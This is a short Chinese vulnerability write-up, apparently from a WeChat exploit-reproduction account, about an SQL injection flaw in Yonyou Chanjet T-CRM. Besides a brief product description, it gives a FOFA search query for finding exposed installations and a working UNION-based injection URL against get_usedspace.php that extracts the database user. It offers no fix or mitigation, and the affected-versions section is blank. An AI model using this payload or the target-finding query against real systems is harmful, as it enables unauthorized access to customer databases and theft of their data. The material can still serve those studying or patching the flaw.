用友畅捷CRM存在SQL注入漏洞
1. 畅捷CRM简介
微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发
用友畅捷通T-CRM是用友公司全力打造的一款基于B/S架构、拥有强大自定义功能、多部门协作(市场、销售和服务)、基于客户全生命周期管理的客户关系管理软件。客户通主要面向成长型中小企业,以客户为中心,以客户营销为目的,帮助他们“提升营销能力,网罗天下商机”。
2.漏洞描述
畅捷CRM系统存在SQL注入漏洞,攻击者可以利用该漏洞获得网站后台数据库信息,构成信息泄露风险。
3.影响版本
4.fofa 查询语句
title=“畅捷CRM”
5.漏洞复现
漏洞链接:
http://127.0.0.1/webservice/get_usedspace.php?site_id=-999%20UNION%20ALL%20SELECT%20CONCAT(0x7e,0x7e,user(),0x7e,0x7e)--
获取到用户名